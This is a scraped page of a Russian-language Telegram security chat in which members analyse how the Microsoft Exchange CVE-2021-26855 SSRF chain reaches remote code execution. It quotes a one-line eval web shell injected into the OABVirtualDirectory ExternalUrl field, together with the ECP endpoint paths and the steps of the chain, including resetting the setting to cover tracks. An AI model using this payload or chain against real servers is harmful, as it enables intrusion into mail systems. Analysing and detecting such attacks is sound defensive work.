Телеграмм чат группы secinfosec страница 8619

@zer0way_1 кстати там в ssrf не пробовал на нетшару сослаться и нтлм словить?

11:19пожаловаться #1

Bezpečárna - počitačová bezpečnost - Odstranění malwaru a virů, počitačová bezpečnost, porady z oblasti informační bezpečnosti

да и вообще судя по байпасу аутентификации, вам нужно просто сходить в админку экчейнжа и из вебморды найти подходящий соап запрос для файлврайта, и потом сунуть его в https://bezpecarna.com/exploitation-example-for-vulnerability-cve-2021-26855/

Exploitation example CVE-2021-26855- Bezpečárna - počitačová bezpečnost

CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server

11:21пожаловаться #2

Zer🦠way in secinfosec

@zer0way_1 кстати там в ssrf не пробовал на нетшару сослаться и нтлм словить?

Оно без указания протокола

11:24пожаловаться #3

а ну вот и детали rce

11:24пожаловаться #4

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

Volexity

Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities | Volexity

11:24пожаловаться #5

11:24пожаловаться #6

действительно в OABVirtualDirectory

11:25пожаловаться #7

похоже что сперва получают папку OABVirtualDirectory, потом ставят свою где то в вебруте, и вызывают какой-то метод для записи файла в эту директорию

11:27пожаловаться #8

о, проглядел, все еще печальнее

11:34пожаловаться #9

ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>

11:34пожаловаться #10

то есть при установке параметра OABVirtualDirectory туда можно сунуть runat=server скрипт прям в параметр, и он исполнится

11:35пожаловаться #11

Andrey in secinfosec

ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>

Это откуда?

11:36пожаловаться #12

с реддита

11:37пожаловаться #13

Pavel Korostelev in secinfosec

Zer🦠way

Один ексч, крутись как хочешь

флешки у офиса разбросать? )))

11:40пожаловаться #14

Zer🦠way in secinfosec

Pavel Korostelev

флешки у офиса разбросать? )))

Это порнография:)

11:41пожаловаться #15

Zer🦠way in secinfosec

Вне скопа:)

11:41пожаловаться #16

Andrey in secinfosec

с реддита

https://twitter.com/80vul/status/1367479893617827841 тут по сути необходимые шаги можно посмотреть

11:42пожаловаться #17

достаточно неплохие кандидаты для поиска по вирустоталу

/ecp/DDI/DDIService.svc/GetObject?msExchEcpCanary=(.*)&schema=OABVirtualDirectory
/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=(.*)&schema=ResetOABVirtualDirectory

да, похоже там использование ssrf для обхода аутентификации, потом извлечение msExchEcpCanary и дальше работа через /ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=(.*)&schema=OABVirtualDirectory и установка параметра

ExternalUrl                     : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["PARAMNAME"],"unsafe");}</script>

11:51пожаловаться #18

что и дает рце

11:51пожаловаться #19

еще и сбрасывают в конце параметр через ResetOABVirtualDirectory, чтоб меньше следов в конфигурации оставлять